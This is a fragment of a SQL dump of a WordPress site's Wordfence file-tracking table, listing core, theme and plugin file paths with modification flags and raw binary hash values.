5','',0,'?'),('�@/��Ĥ�+x���','wp-content/themes/anima/admin/css/meta.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�ߧX��NUR\'��r�',']�:O3�8\n�\0�M�5�c+�s�H�UN�','',0,'?'),('�Gȩ��6����\0Y','wp-admin/includes/class-wp-posts-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m �(�J\Z+x��,�','8�t�Ä���W�#��ښ�̟�+_@C����','',0,'?'),('�I� J��a~R��Z�','wp-admin/includes/class-wp-application-passwords-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[��\\�б�(�\"��E','}|N�on-����q(\\��F�SX�i\'��$','',0,'?'),('�M\0���c����_d�','wp-admin/includes/class-file-upload-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w��;>�x�Z�s�6','[\"o�^�.q`Oצ��v��<���Q�+FM�4��','',0,'?'),('�P!����}�S�Ұ','wp-content/themes/twentytwentyone/assets/sass/05-blocks/list/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,W�� �)��,�^�m','G+xڍaȴѾ䄮�C\0B��,��L��w','',0,'?'),('�f�k[x���� \\�/Y','wp-includes/js/dist/redux-routine.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�����4���s0_�\\','>��eY�;� ��طF�-��@�?|��!W�Xs','',0,'?'),('�l�����3V� \r','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-dashicons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3ˢ$��Krǡ)Fb��','�tM�V_d�B���A��4�D�ڇ��ǒ}��3 (','',0,'?'),('�n\\w�;\\]Ǜ��#�','wp-content/themes/twentynineteen/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��>�������:�t','yg�۱���Jg��zV��x�����=H�','',0,'?'),('�w�h]�á�&�wM��','wp-includes/class-wp-network-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G��R�~|8�Z��1[�','��Z[�JM��D�Ң\n�*Ұ�k�+���:','',0,'?'),('�{��wk5�%����','wp-content/plugins/all-in-one-wp-security-and-firewall/images/form_bg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6N�?l�1���FsT^','�\0+\"\"��:*8l��Ia�-(��/\rsL�','',0,'?'),('מ�y�7mE5���O_�','wp-admin/js/media.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1���NX���\\m��','P��[H{lW�@\0!�!��s�_�/j�F�Č�','',0,'?'),('נ�je�����y\Zb�','wp-content/themes/kidzoo-lite/inc/theme-support.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+��5��J�yt��\n�','0�\Z�\\.ܚv\r��ý̦��ֈ&tH�','',0,'?'),('�Ć��c��ij�B;�','wp-content/plugins/wp-cerber/cerber-pluggable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\%�9��,\rY\Z�+N','\"�&��=+�3ʰ�;��\r�I[h�NY���','',0,'?'),('��j0���w�E}®R�','wp-admin/css/wp-admin.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e�Upʓ�H�WtP!�H','�^���E-�R�����\'#?�le��mL0�kU@�','',0,'?'),('��M|qΚ���SW�','wp-includes/wp-includes/SimplePie/Decode/HTML/Entities.php',0,'��jыp&y������U','��jыp&y������U','��WP��*P=Nϻ;\Z���i��8��2�_��� ','',0,'?'),('���x$��:��D��\\','wp-includes/wp-includes/Requests/Exception/HTTP/405.php',0,'�8т�m!�Ҭ����','�8т�m!�Ҭ����','j�b�횄��^U�sv8�$b����M�3y�','',0,'?'),('��^�u����}�G��','wp-content/plugins/wordfence/lib/email_unlockRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��~͟��ak��','u\Z�g$}o����bĄ��+\r��\n���8�','',0,'?'),('�����C|���Pf��','wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lY�Z�iਆ�3\02[','(��A#��F���~+���Fgh��S�.�b','',0,'?'),('�ahH�N�Ѓ(?>�','wp-content/themes/advance/headers/part-head1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R@]Af �#�V�i�N','�o�Y��@�8�H�C�����*\n��l�','',0,'?'),('�2pq�5��4�L','wp-content/themes/capacious/assets/images/scroll-top-arrow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n%_J]��9_A1L����','��\'7����v�5;��6��1����#ST','',0,'?'),('���j�hP� ���@�','wp-content/themes/storeone/js/owl.carousel.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','TB�����=foQ�','%���uw!w�W>Y*s�q���)Ms7��','',0,'?');
INSERT INTO `wp_wffilemods` VALUES ('�q�`Z�\Z�xu��','wp-includes/wp-includes/sodium_compat/src/Core/ChaCha20.php',0,'��-r�jiI�أe�b','��-r�jiI�أe�b','��b��E����&q�����*��������','',0,'?'),('��<Q����_4�t','wp-content/themes/twentytwentyone/assets/sass/05-blocks/social-icons/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{G��(�땤h��','z��Х��Y���\'R�H�y��Ri�V~��\nȿy�','',0,'?'),('��\Zv�I:wm�\'~K-','wp-includes/ID3/module.audio-video.riff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"���:\'9���P�','��}\",.~�~��s����U�5�~�`x��P�','',0,'?'),('�#bjN�[�쮟/�/�','wp-content/themes/newsmag/template-parts/author-info.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�:[g\rrڽ���q','A\"���� R��cL?�uq�d��AI��^6�^','',0,'?'),('�%tb���BH0�<T','wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/Cached.php',0,'�%�X�������`йKZ','�%�X�������`йKZ','S�W��,��f���K{��\\�������^Y/�','',0,'?'),('�&�Zh�$�Éo�','wp-includes/class-json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kE\Z�[Z����䰱�','�D����t��5��^ �σ�7�2��7�{','',0,'?'),('�(�B��/Q�)N�7\r��','wp-content/themes/cactus/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=_G$���=ׇz���','%b�6����l�i�-���+2wkU�؊�7�7','',0,'?'),('�8/B��$8���`m�','wp-includes/js/imgareaselect/jquery.imgareaselect.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-��?��ES+�','���,��OT[9�pm��Ỵ�Ó,�����=f�','',0,'?'),('�9�\\��\"���6��','wp-content/themes/anima/includes/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ܔ��L#Ȇ![��v��','�����&h����V�2i�W�:�@\'��Q�','',0,'?'),('�<5�:[v3Y� �$�:','wp-includes/wp-includes/ms-default-constants.php',0,'&�%�M�A�b���Y�','&�%�M�A�b���Y�','_%������ ��+�g��`���}<���','',0,'?'),('�A�h)I�\Z]Gr��E','wp-admin/includes/import.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���&�m�|�<��(`�','6\r6\r�@�u<�z(�_�����0�v�*�','',0,'?'),('�C>��J����w��','wp-content/plugins/all-in-one-wp-security-and-firewall/images/info-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ѡ�F�hO\nȆ=�b�','�NrR�\0�Λ$�FN�Y���C%��m�\rK*�','',0,'?'),('�J=R\'���t^�}�\n','wp-content/plugins/wordfence/images/2fa2.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����\0��H','n�p��ʅ���G��0�6Kq�J]����J�','',0,'?'),('�M&�3\r�3CMaQ{','wp-admin/images/yes.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+��7܉�\rqZ�Qk','�=�Q��G���9%�K���,�\r�\ZF�y���','',0,'?'),('�V��5�<�\0���v��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/grade-system/wp-security-feature-item-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��e�z��ku�)-�<K','AG��%N?�LQ=4��c�yO���\',�@�b','',0,'?'),('�b�����F�rI0��','wp-includes/wp-includes/Requests/Exception/HTTP/502.php',0,'|�:l��z��!{�G�i','|�:l��z��!{�G�i','�/���~UJO�.ŀ#��E��5�*�\'C�q','',0,'?'),('�g6��\'R��K�o��','wp-includes/wp-includes/images/smilies/icon_biggrin.gif',0,'�K��Jr��:�]kI�|','�K��Jr��:�]kI�|',':������ٔ���M����X% �<8�g4�','',0,'?'),('�gi��Rk����H��\"\Z','wp-content/themes/wp-barrister/library/images/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�\Z�2�r�)�g�+','�S����j����I�Z�JK(�8�d�����','',0,'?'),('�o�ǣ� ף�f0�Y','wp-includes/SimplePie/Core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ز3aݩ�0)��_�S','���760�w8��([���o�W��K��4d���','',0,'?'),('�ql�W*Qf��J�5�','wp-content/themes/promote/inc/kirki/includes/controls/class-kirki-controls-code-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��+2d�6mܙ�F@','����:&���רC*�C\nJ�U���g�f��~�','',0,'?'),('�v����\r�&X��','wp-includes/js/jquery/ui/selectable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ZIr��]-�4��','�]���+�R��s���z�lC�a���(8��','',0,'?'),('�x��βЦ��A �<�','wp-content/plugins/wordfence/lib/wfCrypt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�R`�����9|�e','U�͊�s��ds�9;�C�O���Ȥ�@','',0,'?'),('ؙp�nyٺ8[�l��WI','wp-content/themes/newsmag/assets/sass/elements/_elements.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ʹ��w�O3I��','�=�8ý��C�n!����Q�b�l���U��','',0,'?'),('ؠ��^y������v�','wp-includes/wp-includes/js/jquery/ui/autocomplete.js',0,':dL�*�E�&*!',':dL�*�E�&*!','��`��Or\r�8;P[Q�=�;����ܣj','',0,'?'),('إ�J�}������n','wp-content/themes/event/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-����N�j�� �','6՜<��X��r| t�b � ��1�\01y��4','',0,'?'),('ة���>�r��#���','wp-content/themes/travel-stories/font/Lora-Bold/lora-bold.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','íp�=�+Z T4bt��',' @<:� ��<ÂҐ��ȑ#hZQ;���|','',0,'?'),('خ�zG�ns�&�CO','wp-content/themes/hueman/assets/front/js/lib/smoothScroll.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(��B�w�k����','p��Q���D��A���[�ƺf&�4z','',0,'?'),('ر�-�_}Z�h��\n�\Z','wp-admin/includes/class-walker-nav-menu-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V��H�Y��SAK�k�\n�','�M��$N}�IF��)M����`\r�c�*�Q4��\'\n','',0,'?'),('ط�;����\0���','wp-content/plugins/wp-cerber/assets/flags/cy.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d�o||/$�B���l','븻�Òc���.\"��0C�i+\Z�\Z�{pċ����a','',0,'?'),('ؽ�)��uҶ�ew��l','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InsufficientFundsException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�mhOല�f�.I','�o�O�b�9_��b�-4��-�x%�T���5E9\'�','',0,'?'),('ؾ��U9���;Y��u','wp-content/themes/advance/author.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;�z#�K^u,,�\'','�X�[�DKVmP��v�qB��}�ux�\'3o��Jk','',0,'?'),('��\\�12%���=6��','wp-content/themes/sg-window/inc/customize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Tw����%\'p\r�','jt�^�>v;4��]�T�8ʨ3�R�ia���g','',0,'?'),('����Aͧ�P\\����','wp-content/themes/showcase-lite/js/jquery.nivo.slider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P.�M<�����Q#\n�','O-r�rY�O���ga�/�- <��҄i2h�','',0,'?'),('�φ{)�e]�ŝ�4ܴ�','wp-content/plugins/wp-cerber/assets/flags/sc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e���\'hz�\Z�uR�m�','1W��b�[^\'�J�Z�O��\0.\n )����','',0,'?'),('��ҡ���K%����^�','wp-includes/js/dist/dom-ready.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B%�� FQe(t','�� j뾸�g���>`�Z�C�\nb3<���w','',0,'?'),('����\"�[^Pư','wp-includes/wp-includes/blocks/calendar/block.json',0,'��Y��P#����(i�','��Y��P#����(i�','�D���]^��~��>�r~]�E^anK-qHMe�','',0,'?'),('�\n�������y��','wp-content/themes/sg-window/img/1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0>I��1\\��eO�','k��Xu � �g��A��I��8�[{5�<�','',0,'?'),('�-h\n\r`��ýەC/s','wp-includes/class-wp-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'\'\'��UQ�|4��','F�7��������S�1�\Z�`#�4�\rHsL\n','',0,'?'),('�?s�\r/4Ѩw�Z�','wp-content/themes/newsmag/assets/vendors/machothemes/components/offscreen.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8~�%!t����K��Е','��K\'*�JT`��wU{�ҝ���d�8N��','',0,'?'),('�>���,���ε?g�','wp-content/themes/hueman/functions/czr/tmpl/modules/body_bg-module-tmpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=ܭq�\r/��U�r��','���͓�� b\n;I\n}�0Yҿ �7Ȥ\".��>q','',0,'?'),('�r��-����D.�\\�','wp-content/themes/twentytwenty/print.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7H7��g��t~��Ǿ^','���^��Q��EQ�>���[�!��Be&z��','',0,'?'),('�%N�^ǽv�7s�@\n�5','wp-content/themes/twentytwentyone/assets/css/ie.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_{�m��<R�zx��','�4R���]�,}�\0���m��E�:��!�','',0,'?'),('�,(�i7:^�^�#','wp-includes/js/tinymce/plugins/paste/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dX�������z҆֫','�f��\0W{?q��������Ul�P�֫c8','',0,'?'),('�-�l[7*#��h~;�','wp-content/themes/promote/inc/kirki/includes/sections/class-kirki-sections-default-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hw�PK�ԕϏ�S�','}��2�;��Az\0����m�Ojv��w�����I','',0,'?'),('�4�_����Gw','wp-includes/wp-includes/Requests/IDNAEncoder.php',0,'�}��2����P�ر','�}��2����P�ر','�M?�~\"��u%�[�,�l����+?F-}�M)�','',0,'?'),('�9\\z��d�I�\"���\"','wp-content/themes/Yegor/no-results.php',0,'\" �y�^�^G��y','\" �y�^�^G��y','um��4��D<�>�}�\\1��.�� :�c��Y','',0,'?'),('�9f1�2D�ʧM}R�h','wp-content/themes/promote/inc/kirki/includes/class-kirki-sanitize-values.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i��Z_���D�\'�����','R;+$����XNűm�X6ʒ�J�FYgOX1M��[','',0,'?'),('�>��[�ұE�D�;�','wp-includes/block-patterns/three-buttons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ǟ�( aL�)�m','\r��)��k���O�dS0�X�z���_����','',0,'?'),('�@�_��E#�]b��^~','wp-content/themes/sg-window/img/logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}�{I�X���s�s���','`�K�rБx`�3o&;\0�}��g��5�o^�','',0,'?'),('�D�Z���i��Ҩ','wp-content/themes/advance/inc/admin/img/service.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J���Ĺ�X�L̵','�/��;�E�X�o�J�l��sޓ4��v�Q�','',0,'?'),('�J��^\Z7��uG�k+','wp-content/plugins/wordfence/lib/wfDB.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�_<���-1�__I��u','�%d����d��_�\01@TY�$����A','',0,'?'),('�M��{0:�\0L���4','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-login-fails.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����N�?Jk����','Q=\0oW�o9�7i�d�@S\Z=�ל�5�%h�T','',0,'?'),('�d��%3��Z�4��_+','wp-includes/css/dist/edit-post/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{J����3=�f�','w��ko����xv&Aޭ�� T�gޗ���','',0,'?'),('�iXx�]�[�8��Ԁ{','wp-content/themes/hueman/assets/czr/js/czr-control.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P��ן;��fC�','L�]�@D���[��O�L���%��m��d','',0,'?'),('�k��/y�����&��G','wp-includes/images/rss-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ya[�Q���rj�','yS0�c`\n7��as��#�n��Y���','',0,'?'),('�l;ao��~�G��','wp-includes/Requests/Exception/HTTP/501.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eڸ04�-?��ב�5','�k�G寲�\nCD#�6�u\Z�քEڣ@K1','',0,'?'),('ق���)�4�g����0h','wp-content/themes/twentynineteen/js/skip-link-focus-fix.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=�oG;� k�\Z\"�','��ՙda��1,6����9�%ef;V�5+�','',0,'?'),('و���RU<ϻ����','wp-content/themes/storeone/images/slide3.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��e$D�^;�A��A','DŽ\\\r��NT�i.��(����7�d�����','',0,'?'),('و�TĖhx~Dt>l�','wp-includes/js/dist/compose.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#g@�ۘΑc�Y<χ�','-ND�Ya�ƖǤ5 ]�ݡ�pat�L�]��\Z','',0,'?'),('٘�\"P�ܞ��,���','wp-content/plugins/wordfence/images/icons/ajax24.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K:�����mP�','j*�e����doX�~�7��&���N�9�|L���','',0,'?'),('٥Ù��M\"�)��Ir','wp-content/themes/promote/inc/customizer/fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���K���J�:��7Y','�[g$��N�<}���5��8ZE�D)�_� ����','',0,'?'),('ٺ��2ڑ�D��,�#�','wp-content/themes/sg-window/img/icons/small/google.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ō) \Z6�������','��۩8�ئf�&0\Z`\'��`���|�v�|o','',0,'?'),('ټ�X�\\k��S��>��','wp-content/themes/anima/resources/js/html5shiv.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�D\r)��7c���O','�(��B5s�TP���<pt%�FI4�L�RZ_��Y','',0,'?'),('پ[��v�J_.�G�','wp-content/themes/twentytwentyone/assets/js/palette-colorpicker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-���|��e,��','#���&=!����ȝp�x�ǻ�\\7��2�y','',0,'?'),('��{��]]��R�\n]','wp-content/plugins/wp-cerber/assets/flags/md.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z6>�x��D�\ZL/x\n','���[Ρj*�Z�\'��ӛ�U!Wa�����\\','',0,'?'),('��3��I�98\\�֛�[t','wp-includes/random_compat/random_int.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�RX�Ǡ�ͤB�n6','8�-%���s�`N��a�L �L�M�ʫ�)�','',0,'?'),('��!}�=�`*�gZ=','wp-admin/network/themes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ь�ԥ�d�o|��ܪ','��%�v\0���\r����:c��GO���','',0,'?'),('��Z���\\�Ze','wp-content/themes/sg-window/woocommerce.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1;��<�S$�ӏ���','D1]ʺ,A�g�M?�u�����w�I�X�z���;,','',0,'?'),('�VBǡ��\Z�B\"\0��','wp-includes/js/codemirror/esprima.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d_� �S��g��ٛ��',']�;�%Js��lx��Fq��BH\Z�U8��','',0,'?'),('�>�~�!�g�q��','wp-includes/js/tinymce/skins/lightgray/skin.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\��B���&�pw�','7>xV&v|��U�& ݷ\"ǥz9j�F%ѽK��V','',0,'?'),('�\0-���o�s�x ���','wp-content/themes/advance/css/unminified/foundation.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�%�5���<�g��0|','���|n���[(�Zr�P�F���#����eI','',0,'?'),('�`���H9�x����','wp-content/themes/promote/css/custom_script.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v<�.�dg�:��','�AzSV����^�n~z�4!����2O۵�?[�','',0,'?'),('�\r��Be�ׯE�7','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Location.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Y}���`8v�FJ','�U��߆(�[�r嵳��g���h��嬵!m9(\"�','',0,'?'),('���u��xy���','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('��w�=Ţ�O�&�F�','wp-admin/css/colors/midnight/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&܍���|DW��!E�4','S��o�Gp����{���\"�FuS�&�����','',0,'?'),('�q\n{Kg�k��6�','wp-includes/wp-includes/js/imgareaselect/imgareaselect.css',0,'}(��()��3���','}(��()��3���','�q�!ݿJӇ��i\n�E�5s�!�\r���%��','',0,'?'),('�\'��7��b��~ 6','wp-includes/sodium_compat/src/Core/Base64/Original.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ң-���с��','�9\0zot�ID:\0����g� I%�~ަ��$o','',0,'?'),('�)f��k�Xy���','wp-content/themes/newsmag/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ȭ\ZJ��rb\0(�ׅ��','�W)k�,�G9�HY�Hϒ� U砆�nT�z�<�','',0,'?'),('�,\r�� �g�H�6','wp-content/plugins/wordfence/views/scanner/issue-wfPluginUpgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L֍6����\0��W','�\0�6�3^r1�l�9cqY�p�h�Okl�\r�K','',0,'?'),('�/l�M�7\Zɕy�r��','wp-includes/wp-includes/sodium_compat/src/Core32/X25519.php',0,'g�b�f>���=���','g�b�f>���=���','����ߺ�`�\'���盱��Жx#i���#�','',0,'?'),('�2�6,̞|ke�L\ns','wp-content/plugins/wordfence/images/2fa1.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/)�h\\ h�G�8�','C�%�0�z)f ����@�t>��ɶ{T��8�o�','',0,'?'),('�:�P����⚧�P�','wp-content/themes/wp-barrister/library/images/icon-search.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',r��D�(�n��H','v��DN�,&�p>��X5%[�go��x#�Vϓ�TYv','',0,'?'),('�D�$Q#5Ұ� �','wp-includes/wp-includes/css/dist/block-library/editor-rtl.min.css',0,'���;.�K� Ld�-�','���;.�K� Ld�-�','�-��]y|��\"c�n��$�q�0LL��c�@','',0,'?'),('�R8_�En\0���FV(','wp-content/themes/maxbusiness/template-parts/content-index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a �S�ȻT~�V�n','B\0��6�WGG�`�_xYW�EF�*���\n�{','',0,'?'),('�`V�\\�������9�','wp-content/themes/twentynineteen/template-parts/content/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7��Gm��xW���d',' N��ż �I6h�%^�?`v�Y�=��2��','',0,'?'),('�al��b��o ;����','wp-content/themes/newsmag/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���M���+S�O���]','x6�@�\n�qv�dR>��{�8^�_��pQ','',0,'?'),('�u78�¸�KԊkh�','wp-content/plugins/wordfence/views/scanner/issue-control-show-details.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?\"p6;�oZB?��6��','�}�SjȎwy��`��`��R=�*�ɒ�\"*g','',0,'?'),('�|�#�#�{����','wp-admin/js/link.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\"1��6�����','z���;���LRK�`�jݰ�P\'�N�v\'','',0,'?'),('ډx`�9�LťM��,L','wp-includes/css/dist/block-editor/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g+a�pzLe*N��&�','���w\\}bXJ1)��]��~I5OS��K��:��','',0,'?'),('ڛM.Io�!2�,��','wp-content/themes/spidermag/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H��?#�;��\0�','%�t6�p\'�����%vс?��t��_\\�/\n','',0,'?'),('ک�W��,`��|','wp-content/themes/skt-pathway/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N�Kb�D�.���^t1','��\"�ǜ˱�����r�\" \n�)�Ap�k��b�','',0,'?'),('ڰXϨ]I�s�_Z�}��','wp-content/themes/twentytwenty/assets/js/color-calculations.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d�0�^�t��}S�','̠U���e�Cb�`aމb���z/ȓ�U','',0,'?'),('ڵ�ͺt}���ɣ]','wp-includes/wp-includes/blocks/html/block.json',0,'�-�FV�y�o����','�-�FV�y�o����','���RA��A�ȧ/��r�4H�-@��(\n �7R4�','',0,'?'),('��#6�K%#f\r�','wp-includes/js/dist/vendor/wp-polyfill-element-closest.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���H0�c;`���W&','2A]�ڛ\\e��WߦkZ�s���c�<�`�d)�','',0,'?'),('��W�S�:�(�=c��','wp-content/themes/twentynineteen/fonts/NonBreakingSpaceOverride.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Gߔ��A���B�\\�','�`GS\"Ŝ(G�u\Z �s�E����P|��','',0,'?'),('����C+�+��%J}','wp-includes/wp-includes/js/dist/vendor/wp-polyfill-formdata.js',0,'�883������x��\r','�883������x��\r','��X�����r�q-��N)��nhl�L�$���','',0,'?'),('����\n]����i�U*�','wp-content/themes/promote/css/promote.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T8� {\0����-m� ','��P.FK��?$���t(4P}�]��D�x�=�','',0,'?'),('��lo�.!q?�_w','wp-content/themes/newsmag/assets/sass/modules/_clearings.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Yz�QO��6�','z8�{�� Ph�#W�T(�$.�8�r�����','',0,'?'),('�櫓��9�zx?t�T','wp-content/themes/travel-stories/font/Open-Sans-Bold/opensansbold.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hŒ��S��:af�G�','\\��\\���;$��@J��Lx�o�Y�e۫e�J','',0,'?'),('�鳟�:yc�\nE� V�','wp-content/themes/advance/inc/kirki/assets/js/branding.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nj@��>�ئ�r�/��','�\06z=�a����\\��(���GmTꥪ7SQ','',0,'?'),('��J�B�&9:V�F[�','wp-includes/js/dist/media-utils.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A{���Z�o��','D�2����<02Ĭ��3������w;,�*�b�','',0,'?'),('���_��\0K�Lé�','wp-content/themes/fastblog/template-parts/meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��t�?\n)3X�g� ','�1IJ��@AZ��Щ+��VO�`� 